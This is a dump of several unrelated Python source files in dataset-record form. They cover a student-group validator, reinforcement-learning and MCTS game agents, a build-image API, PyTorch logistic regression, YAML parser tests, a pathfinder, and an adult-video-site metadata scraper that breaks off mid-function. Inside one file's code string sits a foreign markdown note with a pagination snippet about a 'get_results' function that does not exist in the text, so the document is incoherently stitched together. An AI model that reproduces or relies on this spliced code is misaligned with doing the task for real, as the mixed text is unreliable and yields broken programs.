StudentGroup(Document):\n\tdef validate(self):\n\t\tself.validate_mandatory_fields()\n\t\tself.validate_strength()\n\t\tself.validate_students()\n\t\tvalidate_duplicate_student(self.students)\n\n\tdef validate_mandatory_fields(self):\n\t\tif self.group_based_on == \"Course\" and not self.course:\n\t\t\tfrappe.throw(_(\"Please select Course\"))\n\t\telif self.group_based_on == \"Batch\" and (not self.program or not self.batch):\n\t\t\tfrappe.throw(_(\"Please select Program and Batch\"))\n\n\tdef validate_strength(self):\n\t\tif self.max_strength and len(self.students) > self.max_strength:\n\t\t\tfrappe.throw(_(\"\"\"Cannot enroll more than {0} students for this student group.\"\"\").format(self.max_strength))\n\n\tdef validate_students(self):\n\t\tprogram_enrollment = get_program_enrollment(self.academic_year, self.group_based_on, self.program, self.batch, self.course)\n\t\tstudents = [d.student for d in program_enrollment] if program_enrollment else None\n\t\tfor d in self.students:\n\t\t\tif self.group_based_on != \"Activity\" and d.student not in students:\n\t\t\t\tfrappe.throw(_(\"{0} - {1} is not enrolled in the given {2}\".format(d.student, d.student_name, self.group_based_on)))\n\t\t\tif not frappe.db.get_value(\"Student\", d.student, \"enabled\") and d.active:\n\t\t\t\td.active = 0\n\t\t\t\tfrappe.throw(_(\"{0} - {1} is inactive student\".format(d.student, d.student_name)))\n\n@frappe.whitelist()\ndef get_students(academic_year, group_based_on, program=None, batch=None, course=None):\n\tenrolled_students = get_program_enrollment(academic_year, group_based_on, program, batch, course)\n\n\tif enrolled_students:\n\t\tstudent_list = []\n\t\tfor s in enrolled_students:\n\t\t\tif frappe.db.get_value(\"Student\", s.student, \"enabled\"):\n\t\t\t\ts.update({\"active\": 1})\n\t\t\telse:\n\t\t\t\ts.update({\"active\": 
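`get_results` above reads the page count from the second-to-last `<li>` of the pagination bar, caps it at `max_page`, then fans out requests for the remaining pages; note that its `range(2, page_number)` appears to skip the final page. The pagination step in isolation (the HTML structure is the one the scraper assumes; the URL is a placeholder):

```python
from bs4 import BeautifulSoup

html = """<ul class="pagination">
  <li>1</li><li>2</li><li>3</li><li>next</li>
</ul>"""

soup = BeautifulSoup(html, "html.parser")
pagination = soup.find("ul", "pagination")
# second-to-last <li> holds the last page number; default to one page if absent
page_number = int(pagination.find_all("li")[-2].text) if pagination else 1
# page 1 was already fetched, so request 2..page_number inclusive
page_list = ["https://example.test/search?page=%d" % n
             for n in range(2, page_number + 1)]
print(page_number, page_list)
```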
0})\n\t\t\tstudent_list.append(s)\n\t\treturn student_list\n\ndef get_program_enrollment(academic_year, group_based_on, program=None, batch=None, course=None):\n\tif group_based_on == \"Batch\":\n\t\treturn frappe.db.sql('''select student, student_name from `tabProgram Enrollment` where academic_year = %s\n\t\t\tand program = %s and student_batch_name = %s order by student_name asc''',(academic_year, program, batch), as_dict=1)\n\n\telif group_based_on == \"Course\":\n\t\treturn frappe.db.sql('''\n\t\t\tselect \n\t\t\t\tpe.student, pe.student_name \n\t\t\tfrom \n\t\t\t\t`tabProgram Enrollment` pe, `tabProgram Enrollment Course` pec\n\t\t\twhere\n\t\t\t\tpe.name = pec.parent and pec.course = %s\n\t\t\torder by\n\t\t\t\tpe.student_name asc\n\t\t\t''', (course), as_dict=1)","sub_path":"erpnext/schools/doctype/student_group/student_group.py","file_name":"student_group.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"386956521","text":"''' A toy example of training single-agent algorithm on Leduc Hold'em\n The environment can be treated as normal OpenAI gym style single-agent environment\n'''\n\nimport tensorflow as tf\nimport numpy as np\n\nimport rlcard\nfrom rlcard.agents.random_agent import RandomAgent\nfrom rlcard.agents.dqn_agent import DQNAgent\nfrom rlcard.utils.utils import set_global_seed\nfrom rlcard.utils.logger import Logger\n\n# Make environment and enable single mode\nenv = rlcard.make('uno')\neval_env = rlcard.make('uno')\nenv.set_mode(single_agent_mode=True)\neval_env.set_mode(single_agent_mode=True)\n\n# Set the iterations numbers and how frequently we evaluate/save plot\nevaluate_every = 1000\nsave_plot_every = 1000\nevaluate_num = 10000\ntimesteps = 1000000\n\n# Set the the number of steps for collecting normalization statistics\n# and intial memory size\nmemory_init_size = 1000\nnorm_step = 100\n\n# The paths for saving the logs and learning curves\nroot_path = './experiments/leduc_holdem_single_agent_dqn_result/'\nlog_path = root_path + 'log.txt'\ncsv_path = root_path + 'performance.csv'\nfigure_path = root_path + 'figures/'\n\n# Set a global seed\nset_global_seed(0)\n\nwith tf.Session() as sess:\n global_step = tf.Variable(0, name='global_step', trainable=False)\n agent = DQNAgent(sess,\n scope='dqn',\n action_num=env.action_num,\n replay_memory_size=int(1e5),\n replay_memory_init_size=memory_init_size,\n norm_step=norm_step,\n state_shape=env.state_shape,\n mlp_layers=[128, 128])\n\n sess.run(tf.global_variables_initializer())\n\n # Init a Logger to plot the learning curve\n logger = Logger(xlabel='timestep', ylabel='reward', legend='DQN on Leduc Holdem', log_path=log_path, csv_path=csv_path)\n\n state = env.reset()\n\n for timestep in range(timesteps):\n action = agent.step(state)\n next_state, reward, done = env.step(action)\n ts = (state, action, reward, next_state, done)\n agent.feed(ts)\n\n train_count = timestep - (memory_init_size + norm_step)\n if train_count > 0:\n loss = agent.train()\n print('\\rINFO - Step {}, loss: {}'.format(timestep, loss), end='')\n\n if timestep % evaluate_every == 0:\n rewards = []\n state = eval_env.reset()\n for _ in range(evaluate_num):\n action = agent.eval_step(state)\n _, reward, done = env.step(action)\n if done:\n rewards.append(reward)\n logger.log('\\n########## Evaluation ##########')\n logger.log('Timestep: {} Average reward is {}'.format(timestep, np.mean(rewards)))\n\n # Add point to logger\n 
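`validate` above delegates duplicate detection to `validate_duplicate_student` from `erpnext.schools.utils`, which is not shown in this excerpt. A minimal sketch of what such a check could look like (an assumption about its behavior, not ERPNext's actual code):

```python
def validate_duplicate_student(students):
    """Raise if the same student id appears twice in a group's child table."""
    seen = set()
    for row in students:
        if row["student"] in seen:
            raise ValueError("Student %s is listed more than once" % row["student"])
        seen.add(row["student"])


validate_duplicate_student([{"student": "STU-001"}, {"student": "STU-002"}])  # ok
```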
logger.add_point(x=env.timestep, y=float(reward)/evaluate_num)\n\n # Make plot\n if timestep % save_plot_every == 0:\n logger.make_plot(save_path=figure_path+str(timestep)+'.png')\n\n # Make the final plot\n logger.make_plot(save_path=figure_path+'final_'+str(timestep)+'.png')\n","sub_path":"examples/uno_single.py","file_name":"uno_single.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"8573684","text":"\"\"\"\nMonte Carlo tree search reverse hex player with decisive move simulation policy\nby Isabel McCarten\nstarter code from Mopyhex at https://github.com/yotomyoto/mopyhex\n\"\"\"\nfrom rave_mctsagent import *\n\n\nclass DecisiveMoveMctsagent(RaveMctsagent):\n \n def __init__(self, state=Gamestate(8)):\n super().__init__(state)\n \n def special_case(self, last_move):\n \"\"\"Return a move found without search, None otherwise.\"\"\"\n size = self.rootstate.size\n moves = self.rootstate.moves()\n \n if size < 6:\n move = self.get_small_board_move(last_move, size, moves)\n if move is not None:\n return move\n \n move = self.get_starting_move(last_move, size, moves)\n return move\n\n def roll_out(self, state):\n \"\"\"\n Simulate a random game except that we play all known critical cells\n first, return the winning player and record critical cells at the end.\n \"\"\"\n moves = state.moves()\n good_moves = moves.copy()\n good_opponent_moves = moves.copy()\n to_play = state.turn()\n \n while(state.winner() == Gamestate.PLAYERS[\"none\"]):\n done = False\n while len(good_moves) > 0 and not done:\n move = random.choice(good_moves)\n good_moves.remove(move)\n if not state.would_lose(move, to_play):\n state.play(move)\n moves.remove(move)\n if move in good_opponent_moves:\n good_opponent_moves.remove(move)\n done = True\n \n if not done: \n move = random.choice(moves)\n state.play(move)\n moves.remove(move)\n if move in good_opponent_moves:\n good_opponent_moves.remove(move)\n \n good_moves, good_opponent_moves = good_opponent_moves, good_moves\n \n black_rave_pts = []\n white_rave_pts = []\n\n for x in range(state.size):\n for y in range(state.size):\n if state.board[(x,y)] == Gamestate.PLAYERS[\"black\"]:\n black_rave_pts.append((x,y))\n elif state.board[(x,y)] == Gamestate.PLAYERS[\"white\"]:\n white_rave_pts.append((x,y))\n\n return state.winner(), black_rave_pts, white_rave_pts","sub_path":"decisive_move_mctsagent.py","file_name":"decisive_move_mctsagent.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"191058091","text":"import curses\nimport os\nimport zipfile\nfrom output import OutputModule\nfrom input import InputModule\nfrom domains.Student import *\nfrom domains.Course import *\nfrom domains.Mark import *\n\n\nclass MainModule:\n # main\n s = int(student_num())\n l = 1\n while l <= s:\n l += 1\n add_student()\n show_list_student()\n\n c = int(number_course())\n p = 1\n while p <= c:\n p += 1\n add_course()\n show_list_course()\n\n create_mark()\n for i in range(0, len(Course)):\n ol = int(input(\"You Choose: \"))\n if ol == 1:\n print(\"--STUDENT MARK--\")\n show_mark()\n break\n\n\nmark_gpa()\nmark_cal()\n\npw5 = zipfile.ZipFile('D:\\\\Studies\\\\B2 subjects\\\\git\\\\pp2021\\\\pw5\\\\students.dat', \"w\")\n\nfor folder, subfolders, files in os.walk('D:\\\\Studies\\\\B2 subjects\\\\git\\\\pp2021\\\\pw5'):\n\n for file in files:\n if file.endswith('.py'):\n pw5.write(os.path.join(folder, 
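The decisive-move `roll_out` above biases an otherwise random playout: candidates that `state.would_lose` are filtered out first, and only when no safe candidate remains does it fall back to any legal move. The selection core, game-agnostic (the `would_lose` interface is taken from the snippet above; the stub rule is an assumption for illustration):

```python
import random


class StubState:
    def would_lose(self, move, player):
        return move == "bad"          # toy rule standing in for a real game


def pick_move(state, moves, good_moves, player):
    """Prefer a random candidate that does not lose outright; else any move."""
    while good_moves:
        move = random.choice(good_moves)
        good_moves.remove(move)
        if not state.would_lose(move, player):
            return move
    return random.choice(moves)       # every candidate loses; play one anyway


print(pick_move(StubState(), ["a", "bad"], ["a", "bad"], player=1))  # "a"
```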
file),\n os.path.relpath(os.path.join(folder, file), 'D:\\\\Studies\\\\B2 subjects\\\\git\\\\pp2021\\\\pw5\\\\'),\n compress_type=zipfile.ZIP_DEFLATED)\n\npw5 = zipfile.ZipFile('D:\\\\Studies\\\\B2 subjects\\\\git\\\\pp2021\\\\pw5\\\\students.dat')\npw5.extractall('D:\\\\Studies\\\\B2 subjects\\\\git\\\\pp2021\\\\pw5\\\\Compress and Decompress\\\\')\n\npw5.close()","sub_path":"pw5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"534172028","text":"# -*- coding: utf-8 -*-\n# Copyright 2018 The Chromium OS Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"Image API Service.\n\nThe image related API endpoints should generally be found here.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\n\nfrom chromite.api.gen.chromite.api import image_pb2\nfrom chromite.lib import constants\nfrom chromite.lib import image_lib\nfrom chromite.service import image\n\n# The image.proto ImageType enum ids.\n_BASE_ID = image_pb2.Image.BASE\n_DEV_ID = image_pb2.Image.DEV\n_TEST_ID = image_pb2.Image.TEST\n\n# Dict to allow easily translating names to enum ids and vice versa.\n_IMAGE_MAPPING = {\n _BASE_ID: constants.IMAGE_TYPE_BASE,\n constants.IMAGE_TYPE_BASE: _BASE_ID,\n _DEV_ID: constants.IMAGE_TYPE_DEV,\n constants.IMAGE_TYPE_DEV: _DEV_ID,\n _TEST_ID: constants.IMAGE_TYPE_TEST,\n constants.IMAGE_TYPE_TEST: _TEST_ID,\n}\n\n\nclass Error(Exception):\n \"\"\"The module's base error class.\"\"\"\n\n\nclass InvalidImageTypeError(Error):\n \"\"\"Invalid image type given.\"\"\"\n\n\nclass InvalidArgumentError(Error):\n \"\"\"Invalid argument to an image service function.\"\"\"\n\n\ndef Create(input_proto, output_proto):\n \"\"\"Build an image.\n\n Args:\n input_proto (image_pb2.CreateImageRequest): The input message.\n output_proto (image_pb2.CreateImageResult): The output message.\n \"\"\"\n board = input_proto.build_target.name\n if not board:\n raise InvalidArgumentError('build_target.name is required.')\n\n image_types = set()\n # Build the base image if no images provided.\n to_build = input_proto.image_types or [_BASE_ID]\n for current in to_build:\n if current not in _IMAGE_MAPPING:\n # Not expected, but at least it will be obvious if this comes up.\n raise InvalidImageTypeError(\n \"The service's known image types do not match those in image.proto. 
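The pw5 script above walks a directory tree, stores each `.py` file under a path made relative to the project root (so the absolute `D:\\Studies\\...` prefix does not leak into the archive), then re-extracts everything. The same round trip with portable paths:

```python
import os
import zipfile

root = "."                                    # project directory (illustrative)
with zipfile.ZipFile("students.dat", "w") as zf:
    for folder, _, files in os.walk(root):
        for name in files:
            if name.endswith(".py"):
                full = os.path.join(folder, name)
                # an arcname relative to root keeps the archive relocatable
                zf.write(full, os.path.relpath(full, root),
                         compress_type=zipfile.ZIP_DEFLATED)

with zipfile.ZipFile("students.dat") as zf:
    zf.extractall("extracted")
```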
\"\n 'Unknown Enum ID: %s' % current)\n\n image_types.add(_IMAGE_MAPPING[current])\n\n enable_rootfs_verification = not input_proto.disable_rootfs_verification\n version = input_proto.version or None\n disk_layout = input_proto.disk_layout or None\n builder_path = input_proto.builder_path or None\n build_config = image.BuildConfig(\n enable_rootfs_verification=enable_rootfs_verification, replace=True,\n version=version, disk_layout=disk_layout, builder_path=builder_path,\n )\n\n # Sorted isn't really necessary here, but it's much easier to test.\n result = image.Build(board=board, images=sorted(list(image_types)),\n config=build_config)\n\n output_proto.success = result.success\n if result.success:\n # Success -- we need to list out the images we built in the output.\n _PopulateBuiltImages(board, image_types, output_proto)\n else:\n # Failure -- include all of the failed packages in the output.\n for package in result.failed_packages:\n current = output_proto.failed_packages.add()\n current.category = package.category\n current.package_name = package.package\n if package.version:\n current.version = package.version\n\n return 1\n\n\ndef _PopulateBuiltImages(board, image_types, output_proto):\n \"\"\"Helper to list out built images for Create.\"\"\"\n # Build out the ImageType->ImagePath mapping in the output.\n # We're using the default path, so just fetch that, but read the symlink so\n # the path we're returning is somewhat more permanent.\n latest_link = image_lib.GetLatestImageLink(board)\n read_link = os.readlink(latest_link)\n if os.path.isabs(read_link):\n # Absolute path, use the linked location.\n base_path = os.path.normpath(read_link)\n else:\n # Relative path, convert to absolute using the symlink's containing folder.\n base_path = os.path.join(os.path.dirname(latest_link), read_link)\n base_path = os.path.normpath(base_path)\n\n for current in image_types:\n type_id = _IMAGE_MAPPING[current]\n path = os.path.join(base_path, constants.IMAGE_TYPE_TO_NAME[current])\n\n new_image = output_proto.images.add()\n new_image.path = path\n new_image.type = type_id\n\n\ndef Test(input_proto, output_proto):\n \"\"\"Run image tests.\n\n Args:\n input_proto (image_pb2.ImageTestRequest): The input message.\n output_proto (image_pb2.ImageTestResult): The output message.\n \"\"\"\n image_path = input_proto.image.path\n board = input_proto.build_target.name\n result_directory = input_proto.result.directory\n\n if not board:\n raise InvalidArgumentError('The build_target.name is required.')\n if not result_directory:\n raise InvalidArgumentError('The result.directory is required.')\n if not image_path:\n raise InvalidArgumentError('The image.path is required.')\n\n if not os.path.isfile(image_path) or not image_path.endswith('.bin'):\n raise InvalidArgumentError(\n 'The image.path must be an existing image file with a .bin extension.')\n\n output_proto.success = image.Test(board, result_directory,\n image_dir=image_path)\n","sub_path":"src/third_party/chromite/api/controller/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"642612489","text":"from osim.env import RunEnv\nfrom osim.http.client import Client\n\n\nGRADER_URL = 'http://grader.crowdai.org:1729'\n\n\nclass NIPS(object):\n\n def __init__(self, visualize=False, token=None):\n if token is None:\n self.remote_env = False\n self.env = RunEnv(visualize=visualize)\n else:\n self.remote_env = True\n self.token = 
token\n self.env = Client(GRADER_URL)\n\n @property\n def observation_space(self):\n return self.env.observation_space\n\n @property\n def action_space(self):\n return self.env.action_space\n\n def reset(self):\n if self.remote_env:\n ob = self.env.env_create(self.token)\n else:\n ob = self.env.reset()\n return ob\n\n def step(self, action):\n if self.remote_env:\n ob, reward, done, info = self.env.env_step(action.tolist(), True)\n else:\n ob, reward, done, info = self.env.step(action)\n return ob, reward, done, info\n\n def close(self):\n if self.remote_env:\n self.env.submit()\n else:\n self.env.close()\n\n","sub_path":"dev/nipsenv.py","file_name":"nipsenv.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"427582875","text":"\"\"\"Logistic Regression\nH(x) = P(X=1;W) = 1-P(X=0;W)\n\nweight Update via Gradient Descent\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as f\nimport torch.optim as optim\n\n\nclass BinaryClassifier(nn.Module):\n def __init__(self):\n super().__init__()\n self.linear = nn.Linear(2, 1)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n return self.sigmoid(self.linear(x))\n\n\nmodel = BinaryClassifier()\n\nx_data = [[1, 2], [2, 3], [3, 1], [4, 3], [5, 3], [6, 2]]\ny_data = [[0], [0], [0], [1], [1], [1]]\n\nx_train = torch.FloatTensor(x_data)\ny_train = torch.FloatTensor(y_data)\n\noptimizer = optim.SGD(model.parameters(), lr=1)\n\nepochs = 1000\nfor epoch in range(epochs + 1):\n # hypothesis = 1 / (1 + torch.exp(-(x_train.matmul(W) + b)))\n hypothesis = model(x_train)\n\n # losses = -(y_train * torch.log(hypothesis) + (1 - y_train) * torch.log(1 - hypothesis))\n # cost = losses.mean()\n cost = f.binary_cross_entropy(hypothesis, y_train)\n\n optimizer.zero_grad() # initialize gradients to zero\n cost.backward() # back propagation\n optimizer.step()\n\n if epoch % 100 == 0:\n print(\"Epoch {:4d}/{} Cost: {:.6f}\".format(\n epoch, epochs, cost.item()\n ))\n","sub_path":"Pytorch/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"254110301","text":"import re\n\nfrom django import template\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef absolute_url(url):\n \"\"\"\n Generate absolute url from provided.\n \"\"\"\n\n if re.match(r'^(?:[a-z]+:)?//', url):\n return url\n\n site = Site.objects.get_current()\n scheme = settings.SITE_PROTOCOL\n\n if url.startswith('/'):\n url = url[1:]\n\n return '%s://%s/%s' % (scheme, site, url)\n","sub_path":"iwg_blog/utils/templatetags/tag_utils.py","file_name":"tag_utils.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"328417113","text":"import pytest\n\nfrom tests.utils import config_fixture\nfrom valohai_yaml import parse\n\nexample1_config = config_fixture('example1.yaml')\nexample2_config = config_fixture('example2.yaml')\nboolean_param_config = config_fixture('flag-param-example.yaml')\nmount_config = config_fixture('mount-example.yaml')\nendpoint_config = config_fixture('endpoint-example.yaml')\n\n\ndef test_parse_inputs(example2_config):\n config = example2_config\n step = config.steps['run training']\n assert len(step.inputs) == 5\n\n\ndef test_parse(example1_config):\n
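The logistic_regression.py record above stops after training. A hedged follow-up showing how the trained BinaryClassifier would typically be evaluated, thresholding the sigmoid output at 0.5 (model, x_train and y_train are the names from that script, not new definitions):

import torch

# Evaluation sketch for the training script above.
with torch.no_grad():
    probs = model(x_train)          # sigmoid outputs in (0, 1)
    preds = (probs >= 0.5).float()  # hard labels via a 0.5 threshold
    accuracy = (preds == y_train).float().mean().item()
    print('train accuracy: {:.2%}'.format(accuracy))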
config = example1_config\n # test that we can access a step by name\n step = config.steps['run training']\n\n # test that we parsed all params\n parameters = step.parameters\n assert len(parameters) == 7\n # test that we can access them by name\n assert parameters['seed'].default == 1\n assert parameters['decoder-spec'].default == 'gauss'\n # test that their order is preserved\n assert list(parameters) == [\n 'num-epochs',\n 'seed',\n 'labeled-samples',\n 'unlabeled-samples',\n 'encoder-layers',\n 'denoising-cost-x',\n 'decoder-spec',\n ]\n\n # test that `get_step_by` works\n assert step == config.get_step_by(index=0)\n assert step == config.get_step_by(name='run training')\n assert step == config.get_step_by(image='busybox')\n assert not config.get_step_by(image='bdfaweq')\n assert not config.get_step_by()\n\n\ndef test_command_generation(example1_config):\n config = example1_config\n step = config.steps['run training']\n command = step.build_command({\n 'decoder-spec': 'foo bar\"\"\\'\"\\'\"; quux',\n })\n command = ' && '.join(command)\n # Check that, uh, things, are, um, quoted.\n assert \"--decoder-spec \\'foo bar\\\"\\\"\\'\\\"\\'\\\"\\'\\\"\\'\\\"\\'\\\"\\'\\\"; quux\\'\" in command\n # Check that the params are serialized in order\n last_offset = 0\n for param_name in step.parameters:\n try:\n param_offset = command.index(param_name)\n except ValueError: # not found? ok.\n continue\n assert param_offset > last_offset\n last_offset = param_offset\n assert last_offset # (test that the in-order test actually did something)\n\n\ndef test_command_override(example1_config):\n config = example1_config\n step = config.steps['run training']\n command = step.build_command({'decoder-spec': 'hello'}, command='asdf {params}')\n command = ' && '.join(command)\n assert command.startswith('asdf')\n assert '--decoder-spec hello' in command\n\n\ndef test_boolean_param_parse(boolean_param_config):\n step = boolean_param_config.steps['test']\n assert step.parameters['case-insensitive'].optional\n assert step.parameters['case-insensitive'].choices == (True, False)\n assert step.build_command({'case-insensitive': True}) == ['foo --case-insensitive']\n assert step.build_command({'case-insensitive': False}) == ['foo']\n\n\ndef test_mount_parse(mount_config):\n step = mount_config.steps['test']\n assert len(step.mounts) == 2\n\n\ndef test_endpoint_parse(endpoint_config):\n server_endpoint = endpoint_config.endpoints['server-endpoint']\n assert server_endpoint.image == 'python:3.6'\n assert server_endpoint.port == 1453\n assert server_endpoint.server_command == 'python run_server.py'\n wsgi_endpoint = endpoint_config.endpoints['wsgi-endpoint']\n assert wsgi_endpoint.description == 'predict digits from image inputs'\n assert wsgi_endpoint.image == 'gcr.io/tensorflow/tensorflow:1.3.0-py3'\n assert wsgi_endpoint.wsgi == 'predict_wsgi:predict_wsgi'\n assert len(wsgi_endpoint.files) == 1\n file = wsgi_endpoint.files[0]\n assert file.name == 'model'\n assert file.description == 'Model output file from TensorFlow'\n assert file.path == 'model.pb'\n\n\ndef test_unknown_parse():\n with pytest.raises(ValueError) as e:\n fail_config = '[{ city_name: Constantinople }]'\n parse(fail_config)\n assert e.value.args[0] == \"No parser for {'city_name': 'Constantinople'}\"\n","sub_path":"tests/test_parsing.py","file_name":"test_parsing.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"312196781","text":"import math\n\nfrom 
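test_command_generation in the valohai test_parsing.py record above verifies that parameters are serialized in declaration order by walking string offsets. The same in-order check as a reusable helper, under the record's assumption that absent names are simply skipped:

def assert_appears_in_order(text, names):
    # Assert that each name present in `text` occurs after the previous one.
    last_offset = -1
    for name in names:
        try:
            offset = text.index(name)
        except ValueError:  # absent names are ignored, as in the test
            continue
        assert offset > last_offset
        last_offset = offset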
environment import Arena\nfrom environment.element.object.Wall import Wall\nfrom pathFinder.PathFinder import PathFinder\nfrom util.Direction import Direction\n\n\nclass PersonalPathFinder(PathFinder):\n\n def __init__(self, arena: Arena):\n super(PersonalPathFinder, self).__init__(arena)\n\n def find_path(self, beginning: (int, int), end: (int, int)):\n return self.__get_path(beginning,end,[],[])\n\n\n def __get_path(self,beginning: (int, int), end: (int, int), current_path: [(int, int)], dead_end: [(int, int)]):\n if beginning == end:\n return current_path\n\n for direction in Direction:\n movement = beginning[0] + direction.value[0], beginning[1] + direction.value[1]\n if PersonalPathFinder.__is_closer(beginning, movement, end):\n if not isinstance(self.arena.get_element_at(*movement), Wall) and movement not in dead_end:\n current_path.append(beginning)\n return self.__get_path(movement, end, current_path, dead_end)\n else:\n for new_direction in Direction:\n if new_direction != direction:\n new_movement = beginning[0] + new_direction.value[0], beginning[1] + new_direction.value[1]\n previous_step = current_path[-1]\n if new_movement != previous_step and \\\n not isinstance(self.arena.get_element_at(*new_movement), Wall) and \\\n new_movement not in dead_end:\n\n current_path.append(beginning)\n return self.__get_path(new_movement, end, current_path, dead_end)\n else:\n dead_end.append(beginning)\n beginning = current_path.pop()\n return self.__get_path(beginning, end, current_path, dead_end)\n\n @staticmethod\n def __is_closer(current_pos: (int, int), new_pos: (int, int), end_pos: (int, int)):\n return PersonalPathFinder.__get_distance(new_pos, end_pos) < PersonalPathFinder.__get_distance(current_pos,\n end_pos)\n\n @staticmethod\n def __get_distance(first_pos: (int, int), second_pos: (int, int)):\n return math.sqrt((second_pos[0] - first_pos[0]) ** 2 + (second_pos[1] - first_pos[1]) ** 2)\n","sub_path":"pathFinder/PersonalPathFinder.py","file_name":"PersonalPathFinder.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"343968115","text":"import PAsearchSites\nimport PAutils\nfrom datetime import datetime\nfrom datetime import date\nimport math\n\n\ndef search(results, lang, siteNum, searchData):\n\n # if we have a scene date, we can use the 'Newest scenes' pages to get a match\n if searchData.date:\n\n # there are 99 scenes per page starting with today on page 1,\n # so let's try to determine the page on which we will find a match\n # though this can be a bit random with older scenes\n\n searchDateObj = dateFromIso(searchData.date)\n delta = date.today() - searchDateObj\n searchPage = max(math.ceil(float(delta.days) / 99), 1)\n\n # the first word in the title is usually a name\n searchName = searchData.title.lower().split()[0]\n\n # Log('Scene date: %s, Days delta: %d, Page: %d' % (searchData.date, delta.days, searchPage))\n\n searchUrl = 'https://www.pornworld.com/new-videos/%d'\n dateNotFound = True\n\n while dateNotFound:\n req = PAutils.HTTPRequest(searchUrl % searchPage)\n\n if req.status_code != 200:\n Log('Page %d bad request' % searchPage)\n break\n\n searchResults = HTML.ElementFromString(req.text)\n\n dateResults = searchResults.xpath(\"//div[@class='card-scene__time']/div[@class='label label--time'][2]\")\n\n firstDateObj = dateFromIso(dateResults[0].text_content().strip())\n if searchDateObj > firstDateObj and searchPage > 1:\n searchPage = searchPage - 1\n continue\n\n 
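PersonalPathFinder's private helpers above reduce to one rule: take a neighboring cell only if it strictly shrinks the straight-line distance to the goal. The same test in compact form, with math.hypot in place of the explicit square root:

import math

def is_closer(current, candidate, goal):
    # True when `candidate` is strictly nearer to `goal` than `current`.
    dist = lambda a, b: math.hypot(b[0] - a[0], b[1] - a[1])
    return dist(candidate, goal) < dist(current, goal)

A purely greedy rule like this can oscillate around concave obstacles, which is why the class also records dead_end cells and backtracks along current_path.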
lastDateObj = dateFromIso(dateResults[-1].text_content().strip())\n if searchDateObj < lastDateObj:\n searchPage = searchPage + 1\n continue\n\n dateNotFound = False\n for searchResult in searchResults.xpath(\"//div[contains(concat(' ',normalize-space(@class),' '),' card-scene ')]\"):\n\n titleNoFormatting = searchResult.xpath(\".//div[@class='card-scene__text']/a\")[0].text_content().strip()\n sceneDate = searchResult.xpath('.//div[@class=\"label label--time\"]')[1].text_content().strip()\n sceneDateObj = dateFromIso(sceneDate)\n\n # get the difference in days between the search target and the current scene\n daysDiff = abs((searchDateObj - sceneDateObj).days)\n\n # let's allow scenes +/- two days of the target date as sometimes scenes get re-dated on the site\n if daysDiff < 3:\n\n url = searchResult.xpath('.//a/@href')[0]\n curID = PAutils.Encode(url)\n\n # take off some points if the date is not a precise match\n score = 100 - daysDiff * 10\n\n # try to match the first word/name in the title\n if searchName not in titleNoFormatting.lower():\n # take off some points if we don't match the title search params\n score = score - Util.LevenshteinDistance(searchData.title.lower(), titleNoFormatting.lower())\n\n Log('Scene: %s %s (%s%%)' % (sceneDate, titleNoFormatting, score))\n\n # scene names can be obscure so output the date too\n name = '%s %s' % (sceneDate, titleNoFormatting)\n\n results.Append(MetadataSearchResult(id='%s|%d' % (curID, siteNum), name=name, score=score, lang=lang))\n\n # if we have a date, there's a far better chance of a decent match than the title search, so get out now\n return results\n\n sceneID = searchData.title.split(' ', 1)[0]\n if unicode(sceneID, 'UTF-8').isdigit() and len(sceneID) > 3: # don't match things like '2 girls do something...'\n searchData.title = searchData.title.replace(sceneID, '', 1).strip()\n else:\n sceneID = None\n\n if sceneID:\n url = PAsearchSites.getSearchBaseURL(siteNum) + '/watch/' + sceneID\n req = PAutils.HTTPRequest(url)\n detailsPageElements = HTML.ElementFromString(req.text)\n\n curID = PAutils.Encode(url)\n titleNoFormatting = getTitle(detailsPageElements)\n\n results.Append(MetadataSearchResult(id='%s|%d' % (curID, siteNum), name=titleNoFormatting, score=100, lang=lang))\n\n # if we get to here, results can be extremely sketchy...\n else:\n searchData.encoded = searchData.title.replace(' ', '+')\n req = PAutils.HTTPRequest(PAsearchSites.getSearchSearchURL(siteNum) + searchData.encoded)\n searchResults = HTML.ElementFromString(req.text)\n\n if not searchResults.xpath('//h1[contains(@class, \"section__title\")]'):\n # if there is only one result returned by the search function it automatically redirects to the video page\n titleNoFormatting = getTitle(searchResults)\n\n url = searchResults.xpath('//a[contains(@class, \"__pagination_button--more\")]/@href')[0]\n curID = PAutils.Encode(url)\n\n score = 100 - Util.LevenshteinDistance(searchData.title.lower(), titleNoFormatting.lower())\n\n results.Append(MetadataSearchResult(id='%s|%d' % (curID, siteNum), name='%s [%s]' % (titleNoFormatting, PAsearchSites.getSearchSiteName(siteNum)), score=score, lang=lang))\n return results\n\n for searchResult in searchResults.xpath('//div[@class=\"card-scene__text\"]'):\n titleNoFormatting = searchResult.xpath('./a')[0].text_content().strip()\n\n url = 